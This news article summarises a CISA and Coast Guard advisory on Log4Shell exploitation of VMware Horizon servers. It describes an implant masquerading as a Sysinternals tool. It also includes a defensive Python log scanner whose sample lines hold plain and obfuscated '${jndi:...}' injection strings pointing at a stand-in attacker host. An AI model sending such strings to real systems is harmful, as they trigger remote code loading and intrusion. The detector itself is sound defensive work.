Hackers Continue to Exploit Log4Shell Vulnerability in VMware Horizon Systems

The US Cybersecurity and Infrastructure Security Agency (CISA) and the US Coast Guard Cyber Command (CGCYBER) announced through a joint cybersecurity advisory (CSA) that the Log4Shell vulnerability (CVE-2021-44228) is still being exploited by hackers.

Among the hacker groups detected still exploiting the vulnerability are APT actors, who have been found attacking VMware Horizon servers and Unified Access Gateway (UAG) appliances to gain initial access to organizations that have not applied the available patches.

The CSA provides information, including tactics, techniques, and procedures and indicators of compromise, derived from two related incident response engagements and malware analysis of samples discovered on victim networks.


For those who do not know Log4Shell, it is a vulnerability that first surfaced in December and was actively exploited in Apache Log4j, a popular logging framework for Java applications. It allows arbitrary code to be executed when a specially formatted value of the form "${jndi:URL}" is written to the log.

The vulnerability is notable because the attack can be carried out against Java applications that log values obtained from external sources, for example by displaying problematic values in error messages.
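Because the trigger is simply a "${jndi:...}" lookup string landing in a log line, defenders can hunt for exploitation attempts in web and application logs. The following added example (not from the advisory or the article) scans constructed sample log lines, first stripping the nesting tricks Log4j's lookup syntax permits (${lower:...}, ${upper:...} and the ${x:-y} default-value form) so that obfuscated attempts normalize to the same "${jndi:" marker as the plain one; the log lines and the "attacker.example" host are invented for the example.

```python
import re

# Constructed sample log lines: two benign requests and three carrying JNDI
# lookup strings in the User-Agent field (plain and two obfuscated forms).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /portal/webclient/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /portal/info.jsp HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:r}mi://attacker.example/x}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example}"',
    '10.0.0.6 - - "GET /health HTTP/1.1" 200 "curl/7.79"',
]

# An innermost lookup (no nested "${" inside) that only serves to obfuscate:
# ${lower:X}, ${upper:X}, or the default-value form ${anything:-X}.
_OBFUSCATION = re.compile(r"\$\{(?:(lower|upper):([^${}]*)|[^${}]*?:-([^${}]*))\}")


def _unwrap(match: re.Match) -> str:
    """Replace one obfuscating lookup with the text it resolves to."""
    if match.group(1) == "lower":
        return match.group(2).lower()
    if match.group(1) == "upper":
        return match.group(2).upper()
    return match.group(3)


def normalize(value: str) -> str:
    """Peel obfuscation layers from the inside out until the string is stable."""
    previous = None
    while previous != value:
        previous, value = value, _OBFUSCATION.sub(_unwrap, value)
    return value


# The actual trigger: a JNDI lookup, case-insensitive, after normalization.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_log4shell_attempts(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        if _JNDI_LOOKUP.search(normalized):
            hits.append((number, normalized))
    return hits


if __name__ == "__main__":
    for number, line in find_log4shell_attempts(SAMPLE_LOG_LINES):
        print(f"line {number}: {line}")
```

A hit only shows that an attempt reached the log; whether the lookup fired depends on the Log4j version and configuration, so confirmed hits on unpatched Horizon or UAG hosts warrant the "treat as compromised" handling the advisory describes.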

Almost all projects that use frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink are affected, including Steam, Apple iCloud, and Minecraft clients and servers.

The full alert details several recent cases where hackers have successfully exploited the vulnerability to gain access. In at least one confirmed compromise, the actors collected and extracted sensitive information from the victim's network.

Threat hunting conducted by the US Coast Guard Cyber Command shows that threat actors exploited Log4Shell to gain initial access to an undisclosed victim's network. They uploaded a malware file named "hmsvc.exe", which masquerades as the Microsoft Windows Sysinternals LogonSessions security utility.

An executable embedded within the malware contains various capabilities, including keystroke logging and deployment of additional payloads, and provides a graphical user interface to access the victim's Windows desktop. It can also function as a command-and-control tunneling proxy, allowing a remote operator to reach further into the network, the agencies say.

The analysis also found that hmsvc.exe was running as a local system account with the highest possible privilege level, but did not explain how the attackers elevated their privileges to that point.

CISA and the Coast Guard recommend that all organizations install the updated builds so that every affected VMware Horizon and UAG system runs the latest version.

The alert added that organizations should always keep software up to date and prioritize patching known exploited vulnerabilities. Internet-facing attack surfaces should be minimized by hosting essential services in a segmented demilitarized zone.

“Based on the number of Horizon servers in our data set that are not patched (only 18% were patched as of last Friday night), there is a high risk that this will seriously impact hundreds, if not thousands, of businesses. This weekend also marks the first time we've seen evidence of widespread escalation, going from gaining initial access to beginning to take hostile action on Horizon servers.”

Organizations should also enforce strict access controls at the network perimeter and avoid hosting Internet-facing services that are not essential to business operations.

CISA and CGCYBER encourage users and administrators to update all affected VMware Horizon and UAG systems to the latest versions. If the updates or workarounds were not applied immediately after VMware released its Log4Shell updates, treat all affected VMware systems as compromised. See the CSA "Malicious Cyber Actors Continue to Exploit Log4Shell on VMware Horizon Systems" for more information and additional recommendations.

Finally, if you are interested in knowing more, you can check the details in the following link.
